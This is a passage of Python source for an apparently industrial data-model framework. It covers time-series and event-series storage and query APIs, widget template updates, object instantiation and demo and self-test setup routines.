widgetObject = self.get_node(id)
if widgetObject.get_child("widgetType").get_value() == "timeSeriesWidget":
widgets.append(id)
self.logger.debug(f"update():found widget {widgetObject.get_browse_path()}")
for id in widgets:
path = self.get_browse_path(id)
mirrorBefore = self.get_branch_pretty(path)
self.create_template_from_path(path,self.get_templates()['templates.timeseriesWidget']) # this will create all nodes which are not there yet
# now make specific updates e.g. linking of referencers, update of list to dicts etc.
# if colors is a list: make a dict out of it
colors = self.get_value(f"{id}.hasAnnotation.colors")
tags = self.get_value(f"{id}.hasAnnotation.tags")
if type(colors) is list:
colors = {v:{"color":colors[idx],"pattern":None} for idx,v in enumerate(tags)}
self.logger.debug(f"update(): set value{id}.hasAnnotation.colors := {colors} ")
self.set_value(f"{id}.hasAnnotation.colors",colors)
if not "visibleTags" in mirrorBefore["hasAnnotation"] or (self.get_value(f"{id}.hasAnnotation.visibleTags") != mirrorBefore["hasAnnotation"]["visibleTags"][".properties"]["value"]):
#it is different or new, so we created it now
visibleTags = {tag:True for tag in tags}
#make sure that from the colors, we take them as well
updateVisibleTags = {tag:True for tag in colors}
visibleTags.update(updateVisibleTags)
self.set_value(f"{id}.hasAnnotation.visibleTags",visibleTags)
self.logger.debug(f"update(): set value{id}.visibleTagss := {visibleTags} ")
#make sure the hasAnnotation.annotations referencer points to newannotations as well
self.add_forward_refs(f"{id}.hasAnnotation.annotations",[f"{id}.hasAnnotation.newAnnotations"],allowDuplicates=False)
#now make sure the observers have at least the required properties enabled
widget = self.get_node(id)
helperRoot = helperModel.get_node("root.widget")
template = self.get_templates()['templates.timeseriesWidget']
children = helperRoot.get_children(3)
print(f"2 level children {[node.get_browse_path() for node in children]}")
for child in helperRoot.get_children():
if child.get_properties()["type"] == "observer":
widgetNode = widget.get_child(child.get_name()).get_child("properties")
helperNode = child.get_child("properties")
for prop in helperNode.get_value():
current = widgetNode.get_value()
if prop not in current:
current.append(prop)
widgetNode.set_value(current)
for child in helperRoot.get_children(3):
if child.get_properties()["type"] == "referencer":
self.logger.debug(f"found referencer {child.get_name()}")
# now adjust the references of new nodes and of the ones that were there
targets = child.get_properties()["forwardRefs"]
if targets:
targets = [helperModel.get_browse_path(ref) for ref in targets]
requiredTargets = [widget.get_browse_path()+"."+".".join(ref.split(".")[2:]) for ref in targets]
self.logger.debug(f"required targets {requiredTargets}")
#now check in the model
widgetNodePath = widget.get_browse_path()+ child.get_browse_path()[len(helperRoot.get_browse_path()):]
widgetNode = self.get_node(widgetNodePath)
#now check if we have them
targetPaths = [tNode.get_browse_path() for tNode in widgetNode.get_targets()]
for target in requiredTargets:
if target not in targetPaths:
self.logger.debug(f"adding ref {widgetNode.get_browse_path()} => {target}")
self.add_forward_refs(widgetNode.get_id(),[target])
#now the system progress observer
if not self.get_node("root.system.progress"):
self.create_template_from_path("root.system.progress",self.get_templates()['system.observer'])
self.set_value("root.system.progress.hasEvent",True)
self.set_value("root.system.progress.eventString","system.progress")
self.set_value("root.system.progress.properties",["value"])
self.set_value("root.system.progress.enabled",True)
except Exception as ex:
self.logger.error(f"update() failed: {ex}, {sys.exc_info()[0]}")
helperModel.delete()
self.enable_observers()
# ########################################
# time series api
def time_series_create(self,desc):
id = self.get_id(desc)
return self.ts.create(id)
def time_series_delete(self,desc):
id = self.get_id(desc)
return self.ts.delete(id)
def time_series_insert(self, desc, values=None, times=None, allowDuplicates = False):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
result = self.ts.insert(id,values, times,allowDuplicates=allowDuplicates)
self.__notify_observers(id, "value")
return result
def time_series_append(self, desc, values=None, times=None):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
result = self.ts.append(id,values, times)
self.__notify_observers(id, "value")
return result
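# Usage sketch of the basic time series calls (hypothetical node path; assumes m is a Model instance
# and the node of type "timeseries" already exists in the model):
#   m.time_series_create("root.mytable.variables.a")
#   m.time_series_insert("root.mytable.variables.a", values=[1.0, 2.0], times=[1581483065.0, 1581483066.0])
#   m.time_series_append("root.mytable.variables.a", values=[3.0], times=[1581483067.0])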
def time_series_delete_area(self,desc,start=None,end=None):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
result = self.ts.delete_area(id,start=start,end=end)
self.__notify_observers(id, "value")
return result
def time_series_merge(self, desc, values = None, times = None):
id = self.get_id(desc)
if not id in self.model:
return False
return self.ts.merge(id,values=values,times=times)
def time_series_set(self,desc,values=None,times=None):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
result = self.ts.set(id,values=values,times=times)
self.__notify_observers(id, "value")
return result
def time_series_get_table(self,
variables,
tableDescriptor = None,
start=None,
end=None,
noBins=None,
includeIntervalLimits=False,
resampleTimes=None,
format="default",
toList = False,
resampleMethod = None,
copy=True):
"""
get a time series table from variables (nodes of type "timeseries").
Args:
variables [list of node descriptors]: nodes to be part of the requested data table (ordered!)
tableDescriptor : a descriptor for the table where the variables reside
possible addressing of the requested nodes:
1) ids or browsepaths of nodes (no tableDescriptor needed)
2) names of nodes plus the tableDescriptor of the table (names must be unique in the columns of the table)
start, end [float]:
the start and end time of the table given as seconds since epoch
we also allow the special case of end = 0 and start = -interval
we also allow the special case of start given and end = 0
noBins(int): the number of samples to be returned inside the table between start and end time,
if None is given, we return all samples (rows) we have in the table and do not aggregate
includeIntervalLimits [bool]: if set to true, we will include one more data point each left and right of the requested time
resampleTimes [list of float]: if given, the data is resampled onto these time stamps
format: [enum] "default", "flat", see return description
resampleMethod [enum]:
how to resample if we need to; options are:
None (if not specified): sample and hold
"linear": linear interpolation
"linearfill": linear interpolation and also interpolate "nan" or "inf" values in the original data
toList: (bool) True: return data as python list, False: return numpy arrays
copy: (bool) forwarded to the underlying time series store
examples:
- get all data of the variables
data = m.time_series_get_table(["root.mytable.variables.a","root.mytable.variables.b"]) # get all data
- request max 300 values of data (this is what the UI does)
data = m.time_series_get_table(["a","b"],"root.mytable",start=1581483065.323,end=1581483080.323,noBins=300,includeIntervalLimits=True)
- request data and resample to equidistant 25 sec spacing, also fill possible nan values with interpolation
times = list(range(1581483065,1581483065+100,25))
data = m.time_series_get_table(["a","b"],"root.mytable",resampleTimes = times,resampleMethod = "linearfill")
Returns(dict)
formatting depends on the "format" option
"default": return the result as {"var_a":{"values":[],"__time":[]}, "var_b":{"values":[],"__time":[]}, ...}
"flat": return the result as {"var_a":[], "var_a__time":[], "var_b":[], "var_b__time":[], ...}
the variable descriptors are the ones given in the request
"__time" : list of timestamps for the returned table in epoch seconds as float64
"values": the list of float values of one of the requested variables
"""
if tableDescriptor:
tableId = self.get_id(tableDescriptor)
tableVars = self.get_leaves(tableId+".columns")
else:
tableId = None
if type(start) is str:
start = date2secs(start)
if type(end) is str:
end = date2secs(end)
with self.lock:
#first check if all requested timeseries exist and have type time series
#vars = [] #self.get_id(variables)
if not type(variables) is list:
variables= [variables]
varIds = {} # NodeId: request descriptor
for var in variables:
varId = self.get_id(var)
if not varId:
#try to find per columns and table desc
found = False
if tableId:
for tableVar in tableVars:
if tableVar["name"] == var:
varId = tableVar["id"]
found = True
break
if not found:
self.logger.error(f"requested variable {var} does not exist")
return False
if self.model[varId]["type"]!="timeseries":
self.logger.error(f"requested variable {var} not timeseries, instead {self.model[varId]['type']}")
return False
varIds[varId]=var #remember it for later
table = self.ts.get_table(list(varIds.keys()), start=start, end=end, copy=copy, resampleTimes=resampleTimes, noBins = noBins, includeIntervalLimits=includeIntervalLimits,resampleMethod=resampleMethod)
#now map the results back to the request descriptors: if it was a browsepath, we return a browsepath; if it was an id, we return an id
# make some formatting
def convert(input,toList=toList):
if toList:
return list(input)
else:
return input
result = {}
for k,v in table.items():
if format=="flat":
result[varIds[k]]=convert(v["values"])
result[varIds[k]+"__time"]=convert(v["__time"])
else:
result[varIds[k]] = {"values":convert(v["values"]),"__time":convert(v["__time"])}
#if len(variables) == 1:
# #we only have one variable, so we return without descriptor
# result = result[list(result.keys())[0]]
return result
def time_series_get_info(self,name=None):
return self.ts.get_info(name)
def time_series_get_raw(self,id,start=None,end=None):
table = self.ts.get_table([id], start=start, end=end, copy=False, resampleTimes=None,
noBins=None, includeIntervalLimits=False,
resampleMethod=None)
result = table[id]
return result
def time_series_insert_blobs(self, tableDesc, blobs=[]):
""" blob is a dict or list of dicts of key and values containing one time base like
the descriptors of teh variables can be ids, browsepaths or just names (without dots)
if the descriptors are names, we try to find them in the model, they must exist there uniquely, otherwise
they cant be processed
we also autocreate the table or missing variables
the data will be put in a table:
- we try to find the table based on one of the variables, if not found, we create the table
{
"a": [1.5,1.6,1.7]m
"b": [2,3,4]
"__time" :[100001,100002,100003]
}
"""
if not type(blobs) is list:
blobs=[blobs]
#first, find the table
with self.lock:
tableId = self.get_id(tableDesc)
if not tableId:
#try to find the table from the first node
#table not found, create it
tableId = self.create_node_from_path(tableDesc,properties={"type":"table"})
if tableId:
columnsId = self.create_node(parent=tableId, name="columns", properties={"type": "referencer"})
variablesId = self.create_node(parent=tableId, name="variables", properties={"type": "folder"})
else:
self.logger.error(f"cant create table {tableDesc}")
return False
else:
columnsId = self.get_child(tableId,"columns")
variablesId = self.get_child(tableId, "variables")
#now we know the tableId, columnsId, variablesId
# iterate over all blobs and find the ids of the names in the blobs, if not found, create it
# exchange the descriptors to ids
tableVars = self.get_leaves(columnsId)
desc2Id = {dic["name"]:dic["id"] for dic in tableVars} # key: the descriptor from the input blob, value: the id in the model (preloaded with the existing column names)
#convert all to ids
newBlobs=[]
idsInBlobs=[]
for blob in blobs:
newBlob={}
for k,v in blob.items():
if k=="__time":
newBlob[k]=v
else:
#does this id already exist?
if k in desc2Id:
id = desc2Id[k]
else:
id = None
#try to find
for var in tableVars:
if var["name"] == k:
id = v["id"]
break
if not id:
#still not found, we need to create it
id = self.create_node(parent=variablesId,name=k,properties={"type": "timeseries"})
if not id:
self.logger.error(f"cant find or create {name}")
continue
else:
self.add_forward_refs(columnsId,[id])
desc2Id[k]=id #remember to speed up next time
newBlob[id] = v
idsInBlobs.append(id)
newBlobs.append(newBlob)
self.logger.debug(f"inserting blobs {len(newBlobs)}")
self.__notify_observers(idsInBlobs, "value")
result = self.ts.insert_blobs(newBlobs)
return result
# ########################################
# event series api
def event_series_create(self,desc,map={}):
id = self.get_id(desc)
if "eventMap" in self.model[id]:
self.model[id]["eventMap"].update(map)
else:
self.model[id]["eventMap"]=map.copy()
return self.ts.create(id)
def event_series_get_new_number_entry(self,id):
eventMap = self.model[id]["eventMap"]
numbers = [v for k, v in eventMap.items()]
newNumber = max(numbers)+1
while newNumber in numbers:
newNumber = newNumber+1
return newNumber
def event_series_get_event_number(self, desc, event, autoCreate=True):
id = self.get_id(desc)
if not id:
return None
with self.lock:
eventMap = self.model[id]["eventMap"] # a dict like {"starting":1, "machineStop":2,...}
if type(event) in [str,numpy.str_]:
if event not in [k for k,v in eventMap.items()]:
if not autoCreate:
return None
# we must put a new eventString
if eventMap == {}:
newEventNumber = 1
else:
newEventNumber = self.event_series_get_new_number_entry(id)
self.model[id]["eventMap"][event] = newEventNumber
return newEventNumber
else:
#is a known event string, get the number
return eventMap[event]
else:
#this is a number already, check if it is in the map
eventNumbers = [v for k,v in eventMap.items()]
if event in eventNumbers:
return event
else:
if not autoCreate:
return None
#must create a new entry
try:
#to make sure we have only numbers there
newEventString = "event_"+str(int(event))
self.model[id]["eventMap"][newEventString]=int(event)
except:
self.log_error()
return None
return event
def event_series_insert(self, desc, values=None, times=None, allowEventDuplicates = False):
"""
Args:
values: list of events, where each event is either an event string or an event number
if values is a scalar, we assume that the same event will be inserted for all given times
allowEventDuplicates: setting this to True allows the same event to appear multiple times at the same time stamp;
different events at the same time are always allowed
"""
id = self.get_id(desc)
if not id in self.model:
return None
if not values or not times:
return None
if not(type(values) is list or type(values) is numpy.ndarray):
values = [values]*len(times)
#convert the values to numbers and create new map entry if needed
numbers = numpy.asarray([self.event_series_get_event_number(id,event) for event in values],dtype=numpy.int64)
#convert the times to epoch if not already done
epochs = numpy.asarray([t if type(t) is not str else date2secs(t) for t in times ],dtype=numpy.float64)
if not allowEventDuplicates:
# we must delete the events which exist already at the same time with the same event
data = self.event_series_get(desc)
takeIndices = numpy.full(len(times),True)
for idx,tim in enumerate(times):
duplicates = numpy.where(data["__time"]==tim)[0]
for pos in duplicates:
if numbers[idx] == data["values"][pos]:
takeIndices[idx] = False
numbers = numbers[takeIndices]
epochs = epochs[takeIndices]
with self.lock:
#on the TimeSeries class, allowDuplicates means that the same time stamp can appear multiple times,
# such that different (or the same) events can happen at the same time and thus produce the same
# time stamp in the time series
result = self.ts.insert(id,numbers, epochs, allowDuplicates=True)# we allow 2 events to appear on the same time!
self.__notify_observers(id, "value")
return result
def event_series_set(self,desc,values=None,times=None):
id = self.get_id(desc)
if not id in self.model:
return None
with self.lock:
# now "refresh" the event map
#self.model[id]["eventMap"]={}
numbers = [self.event_series_get_event_number(id, event) for event in values]
result = self.ts.set(id,values=numbers,times=times)
self.__notify_observers(id, "value")
return result
def event_series_get(self,desc, start=None,end=None,format="default",eventFilter=None):
"""
get events from an event series
Args:
desc: node descriptor
start , end [float]:
the start and end time of the requested interval given as seconds since epoch
we also allow the special case of end = 0 and start = -interval
we also allow the special case of start given and end = 0
format: [enum]
"default": return values, times, the event map and the event strings
"iso": like "default", but the timestamps are converted to ISO strings
"events": return a dict of event name -> list of timestamps instead of values/times
eventFilter : [string or list of strings] event strings used as a positive match filter
Returns(dict)
formatting depends on the "format" option
"default": {"values":[...],"__time":[...],"eventMap":{"myevent":1,"anotherevent":2},"eventStrings":[...]}
"""
id = self.get_id(desc)
if not id:
return None
data = self.ts.get_table([id], start=start, end=end)
if data == {}:
#this variable is not in the store
data = {id:{"values":numpy.asarray([]),"__time":numpy.asarray([])}}
eventMap = self.model[id]["eventMap"].copy()
reverseMap = {v:k for k,v in eventMap.items()}
values = data[id]["values"].astype(numpy.int)
times = data[id]["__time"]
#now filter
if eventFilter:
filter = []
if type(eventFilter) is not list:
eventFilter = [eventFilter]
for evString in eventFilter:
if evString in eventMap:
filter.append(eventMap[evString])
indices = [idx for idx,val in enumerate(values) if val in filter]
values = values[indices]
times = times[indices]
result = {
"values":values,
"__time":times,
"eventMap":eventMap,
"eventStrings":[reverseMap[v] for v in values]
}
if format == "iso":
#convert the timestamps to iso
result["__time"]=[epochToIsoString(t) for t in result["__time"]]
if format == "events":
existingEvents = set(result["values"])
events = {reverseMap[ev]:[] for ev in existingEvents}
for ev,ti in zip(result["values"],result["__time"]):
events[reverseMap[ev]].append(ti)
result["events"]=events
del result["values"]
del result["__time"]
del result["eventStrings"]
return result
def event_series_insert_blob(self,blob):
"""
insert events in various blob syntax
Args:
blob: a dictionary containing the node descriptor and the events, in one of several styles
a) {
"node": nodedescriptor
"events":"startMachine"
"__time": ["2018.01.01T00:10:08.445+02:00",1546437120.2,1546437121.2,1546437122.2]# allows ISO or epoch
}
b) {
"node": nodedescriptor
"events":["startMachine","stopMachine","startMachine","startMachine"]
"__time": ["2018.01.01T00:10:08.445+02:00",1546437120.2,1546437121.2,1546437122.2]# allows ISO or epoch
}
c) {
"node": nodedescriptor
"events":[
{"event":"startMachine",
"__time":"2018.01.01T00:10:08.445+02:00"
},
{"event":"stopMachine",
"__time":"2018.01.01T00:10:08.445+02:00"
}
]
}
Returns
true/false for success
"""
if type(blob["events"]) is not list:
#style a)
events = blob["events"]
times = blob["__time"]
else:
#events is a list
if type(blob["events"][0]) is dict:
#style c)
events = []
times = []
for d in blob["events"]:
events.append(d["event"])
times.append(d["__time"])
else:
#style b)
events = blob["events"]
times = blob["__time"]
return self.event_series_insert(blob["node"],events,times)
def event_series_delete(self,desc,start=None, end = None, eventsToDelete=[]):
id = self.get_id(desc)
if not id:
return None
if start == None and end == None and eventsToDelete == []:
#delete all
with self.lock:
self.model[id]["eventMap"]={}
result = self.ts.set(id, values=[], times=[])
else:
#delete some events
with self.lock:
data = self.ts.get_table([id])
if not start:
start = 0
if not end:
end = numpy.inf
times = data[id]["__time"]
values = data[id]["values"]
over = times>=start
under = times<=end
deleteMaskTime = over & under
if eventsToDelete == []:
deleteMaskValues = numpy.full(len(deleteMaskTime),True)
else:
deleteMaskValues = numpy.full(len(deleteMaskTime),False)
for ev in eventsToDelete:
evNumber = self.model[id]["eventMap"][ev]
mask = values == evNumber
deleteMaskValues = deleteMaskValues | mask
deleteMask = deleteMaskTime & deleteMaskValues
times = times[~deleteMask]
values = values[~deleteMask]
self.event_series_set(id,values,times)
def get_object(self,desc):
id = self.get_id(desc)
if not id:
return False
with self.lock:
if not self.model[id]["type"] == "object":
return None
if "object" not in self.model[id]:
return None
return self.model[id]["object"]
def instantiate_object(self,desc,writeToModel=True):
id = self.get_id(desc)
if not id:
return False
with self.lock:
if not self.model[id]["type"] == "object":
return False
try:
className = self.model[id]["class"]
if "autoReload" in self.model[id] and self.model[id]["autoReload"]==True and self.global_auto_reload_enabled():
# must reload the module
module = importlib.reload(self.objectClasses[className]["module"])
classDefinition = getattr(module, className.split('.', 1).pop())
# now update our global list
self.objectClasses[className]["module"] = module
self.objectClasses[className]["class"] = classDefinition
classDefinition = self.objectClasses[className]["class"]
object = classDefinition(self.get_node(id)) #instantiate the object
if writeToModel:
self.model[id]["object"]=object
return object
except:
self.log_error()
return None
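# Usage sketch (assumes a node of type "object" with a registered class; autoReload behaviour depends on the model settings):
#   obj = m.instantiate_object("root.myObject")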
def instantiate_all_objects(self):
with self.lock:
#make a list first for iteration, we can't iterate over the model,
# as the instantiation of object might produce new nodes while we iterate
objects = [k for k,v in self.model.items() if v["type"] == "object"]
for id in objects:
try:
self.instantiate_object(id)
except:
self.log_error()
def reset_all_objects(self):
with self.lock:
#make a list first for iteration, we can't iterate over the model,
# as the instantiation of object might produce new nodes while we iterate
objects = [k for k,v in self.model.items() if v["type"] == "object"]
for id in objects:
try:
self.get_object(id).reset(None)
except:
self.log_error()
def global_auto_reload_enabled(self):
if self.get_value("root.system.enableAutoReload") == False:
return False
else:
return True # this will also be the case if the node is not there, as the get_value return None then
def create_test(self,testNo=1):
"""
this function creates tests for demonstration purposes
"""
if testNo == 1:
self.create_node("root",name="variables",type="folder")
for var in ["f0","f1","f2","f3","count","time","back"]:
self.create_node("root.variables",name=var,type="column")
self.create_node_from_path('root.folder2.myconst',{"type":"const","value":"21data"})
self.create_node_from_path('root.folder2.myfkt', {"type": "function"})
#for the visu
self.create_node_from_path('root.visualization.pipelines.occupancy.url',{"type":"const","value":"http://localhost:5006/bokeh_web"})
self.create_node_from_path('root.visualization.pipelines.demo2.url',{"type":"const","value":"http://21data.io"})
#create an official table
template = [
{
"name": "description",
"type": "const",
"value": "this is a great table"
},
{
"name": "columns",
"type": "referencer",
},
{
"name": "timeField",
"type": "referencer",
},
{
"name": "numberOfRows",
"type": "variable",
"value": 0
}
]
self.create_node("root", name="mytable", type="table")
self.create_nodes_from_template("root.mytable", template=template)
for var in ["f0","f1","f2","f3","time","back"]:
self.add_forward_refs("root.mytable.columns",["root.variables."+var])
self.add_forward_refs("root.mytable.timeField", ["root.variables.time"])
#add data
startTime=datetime.datetime(2018,1,1,0,0,0,tzinfo=pytz.UTC)
vars={"f0":0.01,"f1":0.02,"f2":0.04,"f3":0.1,"back":0.01}
SIZE = 10*60 # in seconds units
STEP = 0.1
#!!! we are producing size/step time points
""" for i in range(SIZE):
dataDict = {}
for var in vars:
value = numpy.cos(2*numpy.pi*vars[var]*i/SIZE*3)
dataDict["root.variables."+var]=value
mytime = startTime + datetime.timedelta(seconds = i)
dataDict["root.variables.time"] = mytime
#print(mytime)
self.add_timeseries(dataDict)
"""
startEpoch = date2secs(startTime)
times = numpy.arange(startEpoch,startEpoch+SIZE,STEP,dtype=numpy.float64)
print("we have time:",times.shape)
for var in vars:
values = numpy.cos(2*numpy.pi*vars[var]*times)
id=self.get_id("root.variables."+str(var))
if var =="back":
#we make -1,0,1 out of it
values = numpy.round(values)
self.model[id]["value"]=values.tolist()
id = self.get_id("root.variables.time")
self.model[id]["value"]=(times).tolist()
#now correct the background
#now make some widget stuff
self.create_node_from_path('root.visualization.widgets.timeseriesOne',{"type":"widget"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.selectableVariables',
{"type":"referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.selectedVariables',
{"type": "referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.startTime',
{"type": "variable","value":None})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.endTime',
{"type": "variable","value":None})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.bins',
{"type": "const","value":300})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation',
{"type": "const", "value": True})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasSelection',
{"type": "const", "value": False})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.annotations',
{"type": "referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.newAnnotations',
{"type": "folder"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.tags',
{"type": "const","value":["one","two"]})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.hasAnnotation.colors',
{"type": "const","value":["yellow","brown","greay","green","red"]})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.table',
{"type": "referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.lineColors',
{"type": "const", "value": ["blue", "yellow", "brown", "grey", "red"]})
self.add_forward_refs('root.visualization.widgets.timeseriesOne.selectedVariables',['root.variables.f0','root.variables.f1','root.variables.f3'])
self.add_forward_refs('root.visualization.widgets.timeseriesOne.selectableVariables',['root.variables'])
self.add_forward_refs('root.visualization.widgets.timeseriesOne.table',['root.mytable'])
self.create_node_from_path('root.visualization.widgets.timeseriesOne.observer',{"type":"referencer"})
self.create_node_from_path('root.visualization.widgets.timeseriesOne.observerUpdate', {"type": "const","value":["line","background","annotations"]})
#now the annotations
anno = [
{
"name": "tags",
"type": "const",
"value": ["one","two"]
},
{
"name": "startTime",
"type": "const",
"value": None
},
{
"name": "endTime",
"type": "const",
"value": None
},
{
"name": "text",
"type": "const",
"value": "this is a great annotation"
}
]
tags=["one","two","one","one","two","two","one","one","one","two","one","one"]
self.create_node_from_path("root.annotations",{"type":"folder"})
startTime = datetime.datetime(2018, 1, 1, 0, 0, 0, tzinfo=pytz.UTC)
for i in range(10):
newAnno = copy.deepcopy(anno)
newAnno[1]["value"] = (startTime + datetime.timedelta(minutes=(i*10))).isoformat()
newAnno[2]["value"] = (startTime + datetime.timedelta(minutes=(i*10+1))).isoformat()
newAnno[0]["value"] = [tags[i],tags[i+1]]
newAnnoPath = "root.annotations.anno"+str(i)
self.create_node_from_path(newAnnoPath,{"type":"annotation"})
self.create_nodes_from_template(newAnnoPath,newAnno)
#also add the annotations to the widget
self.add_forward_refs("root.visualization.widgets.timeseriesOne.hasAnnotation.annotations",["root.annotations","root.visualization.widgets.timeseriesOne.hasAnnotation.newAnnotations"])
#make a real function
self.create_node_from_path("root.functions",{"type":"folder"})
self.create_nodes_from_template("root.functions",[self.templates["testfunction.delayFunctionTemplate"]])
#now make a custom function to trigger something
self.create_nodes_from_template("root.functions",[self.templates["counterfunction.counterFunctionTemplate"]])
#now hook the function output to the observer of the plot
self.add_forward_refs('root.visualization.widgets.timeseriesOne.observer',['root.functions.counterFunction.output'])
#now make custom buttons
buttons = [
{
"name":"button1",
"type":"folder",
"children":[
{"name":"caption","type":"const","value":"start learner"},
{"name":"counter", "type": "variable", "value":0},
{"name": "onClick", "type": "referencer"}
]
}
]
self.create_node_from_path("root.visualization.widgets.timeseriesOne.buttons",{"type":"folder"})
self.create_nodes_from_template("root.visualization.widgets.timeseriesOne.buttons",buttons)
self.add_forward_refs("root.visualization.widgets.timeseriesOne.buttons.button1.onClick",["root.functions.counterFunction"])
#now the backgrounds
self.create_node_from_path("root.visualization.widgets.timeseriesOne.hasBackground",{"type":"const","value":True})
self.create_node_from_path("root.visualization.widgets.timeseriesOne.background",{"type":"referencer"})
self.add_forward_refs("root.visualization.widgets.timeseriesOne.background",["root.variables.back"])
self.create_node_from_path("root.visualization.widgets.timeseriesOne.backgroundMap",{"type":"const","value":{"1":"red","0":"green","-1":"blue","default":"white"}})
self.show()
elif testNo == 2:
#we take the full test number 1 and rearrange some things
self.create_test(1)
self.currentModelName = "occupancydemo"
import data.occupancy_data.occupancy as occ
occData = occ.read_occupancy("./data/occupancy_data/datatest2.txt")
#create an official table
template = [
{
"name": "description",
"type": "const",
"value": "this is the occupancy data table"
},
{
"name": "columns",
"type": "referencer",
},
{
"name": "timeField",
"type": "referencer",
},
{
"name": "variables",
"type": "folder",
}
]
self.create_node("root", name="occupancy", type="table")
self.create_nodes_from_template("root.occupancy", template=template)
for var in occData:
path = "root.occupancy.variables."+var
self.create_node_from_path(path,{"type":"column"})
self.set_value(path,occData[var])
self.add_forward_refs("root.occupancy.columns",[path])
self.add_forward_refs("root.occupancy.timeField",["root.occupancy.variables.date"])
#now create the classification
self.create_node("root.occupancy", name="classification", type="column")
self.set_value("root.occupancy.classification", [0]*len(occData[list(occData.keys())[0]]))
self.add_forward_refs("root.occupancy.columns", ["root.occupancy.classification"])
#create another TS-widget
self.create_node_from_path('root.visualization.widgets.timeseriesOccupancy', {"type": "widget"})
self.create_nodes_from_template('root.visualization.widgets.timeseriesOccupancy',modeltemplates.timeseriesWidget)
self.create_nodes_from_template('root.visualization.widgets.timeseriesOccupancy.buttons.button1',modeltemplates.button)
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.selectedVariables',["root.occupancy.variables.Temperature"])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.selectableVariables',["root.occupancy.variables"])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.table',['root.occupancy'])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.background',['root.occupancy.classification'])
self.set_value('root.visualization.widgets.timeseriesOccupancy.backgroundMap', {"0": "brown", "1": "yellow", "-1": "blue", "default": "white"}) #match annotation colors
#self.set_value('root.visualization.widgets.timeseriesOccupancy.backgroundMap', {"0": "blue", "1": "black", "-1": "blue", "default": "white"}) #match annotation colors
self.set_value('root.visualization.widgets.timeseriesOccupancy.hasAnnotation.tags',["busy","free"])
#now create the logistic regression
self.create_nodes_from_template('root',[self.templates["logisticregression.logisticRegressionTemplate"]])
self.add_forward_refs('root.logisticRegression.input',['root.occupancy.variables.Temperature', 'root.occupancy.variables.Light','root.occupancy.variables.CO2'])
self.add_forward_refs('root.logisticRegression.output', ['root.occupancy.classification'])
self.add_forward_refs('root.logisticRegression.annotations',['root.visualization.widgets.timeseriesOccupancy.hasAnnotation.newAnnotations'])
self.set_value('root.logisticRegression.categoryMap', {"busy": 1, "free": 0})
#also hook the button on it
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.buttons.button1.onClick',['root.logisticRegression'])
self.add_forward_refs('root.visualization.widgets.timeseriesOccupancy.observer',['root.logisticRegression.executionCounter']) # observe the execution of the scorer
self.show()
elif testNo == 3:
# make some nodes
for id in range(10):
self.create_node_from_path("root.add.var"+str(id), {"type": "variable", "value": id+100})
for id in range(100):
self.create_node_from_path("root.remove.var"+str(id), {"type": "variable", "value": id+100})
self.create_node_from_path("root.change_name_one")
self.create_node_from_path("root.change_value")
self.create_node_from_path("root.move.first")
self.create_node_from_path("root.move.second")
self.create_node_from_path("root.refs",properties={"type":"referencer"})
self.add_forward_refs("root.refs",["root.move.first","root.move.second","root.move"])
#now start a thread that changes the tree periodically
def __update_tree():
while True:
time.sleep(3.0)
with self.lock:
self.logger.debug("__update_tree")
self.create_node_from_path("root.add.dyn"+str(uuid.uuid4()))
removeFolder = self.get_id("root.remove")
if self.model[removeFolder]["children"]:
self.delete_node(self.model[removeFolder]["children"][0])
id = self.get_id("root.change_name_one")
if id:
self.model[id]["name"]="change_name_two"
else:
id = self.get_id("root.change_name_two")
self.model[id]["name"]="change_name_one"
id = self.get_id("root.move")
self.model[id]["children"].reverse()
id=self.get_id("root.refs")
self.model[id]["forwardRefs"].reverse()
self.set_value("root.change_value",int(uuid.uuid4())%100)
self.testThread = threading.Thread(target=__update_tree)
self.testThread.start()
if __name__ == '__main__':
def test1():
m=Model()
m.create_node("root",name="folder1")
m.create_node("root.folder1",name="folder2")
m.create_node("2",name="second")
m.create_node("root",name="myreferencer",type="referencer")
m.create_node("root.folder1",name="myvar",type="variable")
m.set_value("root.folder1.myvar",44.5)
m.add_forward_refs("root.myreferencer",["root.folder1"])
m.add_property("root.folder1.folder2","uasource","192.168.5.6")
m.show()
m.get_model()
m.delete_node("root.myreferencer")
return m
def test_template():
m=Model()
template = {
"myfunction": {
"type": "function",
"value": "someValue",
"opcua":"opc.tcp://129.160.1.1:4880::n2=2;s=mystrin"
},
"myreferencer": {
"type": "referencer",
"forwardRefs": ['.myfolder.var1', '.myfolder.var2', '.myfolder.var3']
},
"myfolder": {
"type": "folder",
"children": {
"var1": {"type": "const", "value": "1"},
"var2": {"type": "variable"},
"var3": {"type": "timeseries"},
}
},
}
m.create_nodes_from_template(template=template)
m.show()
def save_test():
print("save and load test")
m=Model()
m.create_test()
m.save("savetest")
n=Model()
n.load("savetest")
if len(n.get_model())!= len(m.get_model()):
print("unequal size")
return False
#now compare
mModel = m.get_model()
nModel = n.get_model()
for nodeId in mModel:
#print("check",nodeId)
try:
if nModel[nodeId]!=mModel[nodeId]:
print("unequal before after ",nodeId,m[nodeId],n[nodeId])
return False
except:
print("cant find",nodeId)
return False
print("savetest passed")
return True
def plugintest():
m=Model()
m.create_node("root", name="folder1")
m.create_nodes_from_template("root.folder1",m.templates["testfunction.delayFunctionTemplate"])
m.show()
m.execute_function("root.folder1.delayFunction")
